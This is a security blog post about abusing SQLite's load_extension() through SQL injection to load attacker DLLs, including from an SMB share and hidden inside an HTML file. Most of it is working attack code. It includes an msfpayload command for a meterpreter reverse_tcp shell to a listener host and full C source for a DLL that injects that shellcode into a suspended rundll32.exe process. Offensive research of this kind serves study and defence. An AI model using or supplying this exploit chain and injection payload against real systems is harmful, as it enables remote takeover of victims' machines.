Fun with SQLite Load_Extension

What is load_extension?

This interface loads an SQLite extension library from the named file.

[code language=”C”]
int sqlite3_load_extension(
sqlite3 *db, /* Load the extension into this database connection */
const char *zFile, /* Name of the shared library containing extension */
const char *zProc, /* Entry point. Derived from zFile if 0 */
char **pzErrMsg /* Put error message here if not 0 */
);
[/code]

More information: https://www.sqlite.org/c3ref/load_extension.html
You can use this function to load a SQLite extension. However by default sqlite3_enable_load_extension() is turned off by default to prevent this in SQL injection attacks. You can read more from here https://www.sqlite.org/c3ref/enable_load_extension.html
The syntax would be
[code language=”sql”]
select load_extension(‘path\dll’, ‘EP’);
[/code]
However this path, const char *zFile can be a SMB share too.

Custom DLLs

We can of course code our own malicious DLLs and execute our own malicious code.
[code language=”C”]
#include <windows.h>
/*
* Author: @OsandaMalith
* Website: https://osandamalith.com
*/
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
MessageBox(0, "You got pwned", "@OsandaMalith", MB_OK | MB_ICONERROR);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
MessageBox(0, "Unloading DLL", "@OsandaMalith", MB_OK | MB_ICONWARNING);
break;
}
return TRUE;
}

int hello() {
MessageBox(0, "Just Kidding :)", "@OsandaMalith", MB_OK | MB_ICONINFORMATION);
}
[/code]
We can also use MASM32 to code the DLL which will be extremely small in size.

.386
; Author: @OsandaMalith
; Website: https://osandamalith.com
.MODEL flat,stdcall
OPTION CASEMAP:NONE
Include windows.inc
Include user32.inc
Include kernel32.inc
IncludeLib user32.lib
IncludeLib kernel32.lib
.DATA
AppName db "DLL Skeleton",0
HelloMsg db "Just Kidding :)",0
LoadMsg db "You got Pwned!",0
UnloadMsg db "The DLL is unloaded",0
ThreadCreated db "A thread is created in this process",0
ThreadDestroyed db "A thread is destroyed in this process",0
.code
DllEntry proc hInstance:HINSTANCE, reason:DWORD, reserved1:DWORD
.if reason==DLL_PROCESS_ATTACH
invoke MessageBox,NULL,addr LoadMsg,addr AppName,MB_OK + MB_ICONERROR + MB_RTLREADING
.elseif reason==DLL_PROCESS_DETACH
invoke MessageBox,NULL,addr UnloadMsg,addr AppName,MB_OK + MB_ICONWARNING
.elseif reason==DLL_THREAD_ATTACH
invoke MessageBox,NULL,addr ThreadCreated,addr AppName,MB_OK
.else
invoke MessageBox,NULL,addr ThreadDestroyed,addr AppName,MB_OK
.endif
mov eax,TRUE
ret
DllEntry Endp
hello proc
invoke MessageBox,NULL,addr HelloMsg,addr AppName,MB_OK + MB_ICONINFORMATION + MB_RTLREADING
ret
hello endp
End DllEntry

View post on imgur.com

HTML + DLL

You can check out the drop_and_run project by hasherezade https://github.com/hasherezade/snippets/tree/master/drop_and_run
The demo.html is a file which has our DLL embedded within HTML comments.
So we can embed our malicious DLL code inside a HTML file 🙂
[code language=”sql”]
select load_extension(‘\\192.168.0.100\WinAsm\dll\cdll.html’,’hello’);
[/code]

View post on imgur.com

Shellcode + GameOver

We can use shellcode and compile our own DLL. For this example I’m using a meterpreter reverse tcp shellcode.
[code]
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=4444 R| msfencode -e x86/shikata_ga_nai -b ‘\x00\x0A\x0D’ -t c
[/code]

[code language=”C”]
#include <windows.h>
/*
* Website: https://osandamalith.com
*/
#define SCSIZE 2048
unsigned char code[SCSIZE] =
"\xb8\xdc\x16\x51\xba\xdb\xd0\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x49\x83\xc5\x04\x31\x45\x10\x03\x45\x10\x3e\xe3\xad\x52\x37"
"\x0c\x4e\xa3\x27\x84\xab\x92\x75\xf2\xb8\x87\x49\x70\xec\x2b"
"\x22\xd4\x05\xbf\x46\xf1\x2a\x08\xec\x27\x04\x89\xc1\xe7\xca"
"\x49\x40\x94\x10\x9e\xa2\xa5\xda\xd3\xa3\xe2\x07\x1b\xf1\xbb"
"\x4c\x8e\xe5\xc8\x11\x13\x04\x1f\x1e\x2b\x7e\x1a\xe1\xd8\x34"
"\x25\x32\x70\x43\x6d\xaa\xfa\x0b\x4e\xcb\x2f\x48\xb2\x82\x44"
"\xba\x40\x15\x8d\xf3\xa9\x27\xf1\x5f\x94\x87\xfc\x9e\xd0\x20"
"\x1f\xd5\x2a\x53\xa2\xed\xe8\x29\x78\x78\xed\x8a\x0b\xda\xd5"
"\x2b\xdf\xbc\x9e\x20\x94\xcb\xf9\x24\x2b\x18\x72\x50\xa0\x9f"
"\x55\xd0\xf2\xbb\x71\xb8\xa1\xa2\x20\x64\x07\xdb\x33\xc0\xf8"
"\x79\x3f\xe3\xed\xfb\x62\x6c\xc1\x31\x9d\x6c\x4d\x42\xee\x5e"
"\xd2\xf8\x78\xd3\x9b\x26\x7e\x14\xb6\x9e\x10\xeb\x39\xde\x39"
"\x28\x6d\x8e\x51\x99\x0e\x45\xa2\x26\xdb\xc9\xf2\x88\xb4\xa9"
"\xa2\x68\x65\x41\xa9\x66\x5a\x71\xd2\xac\xf3\x1b\x28\x27\x3c"
"\x73\x32\xd1\xd4\x81\x33\x0c\x79\x0c\xd5\x44\x91\x58\x4d\xf1"
"\x08\xc1\x05\x60\xd4\xdc\x63\xa2\x5e\xd2\x94\x6d\x97\x9f\x86"
"\x1a\x57\xea\xf5\x8d\x68\xc1\x90\x31\xfd\xed\x32\x65\x69\xef"
"\x63\x41\x36\x10\x46\xd9\xff\x84\x29\xb6\xff\x48\xaa\x46\x56"
"\x02\xaa\x2e\x0e\x76\xf9\x4b\x51\xa3\x6d\xc0\xc4\x4b\xc4\xb4"
"\x4f\x23\xea\xe3\xb8\xec\x15\xc6\x38\xd1\xc3\x2f\xbf\x23\x66"
"\x5c\x03";

void inline_bzero(void *p, size_t l)
{

BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}

void boom(void);

BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
boom();
break;

case DLL_PROCESS_DETACH:
break;

case DLL_THREAD_ATTACH:
break;

case DLL_THREAD_DETACH:
break;
}
return TRUE;
}

void boom(void) {
int error;
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
DWORD prot;
LPVOID ep;

inline_bzero( &si, sizeof( si ));
si.cb = sizeof(si);

if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);

ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);

#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif

SetThreadContext(pi.hThread,&ctx);

ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
ExitThread(0);
}

[/code]

View post on imgur.com

Mentions:
https://rinige.com/index.php/archives/538/

One thought on “Fun with SQLite Load_Extension

Leave a Reply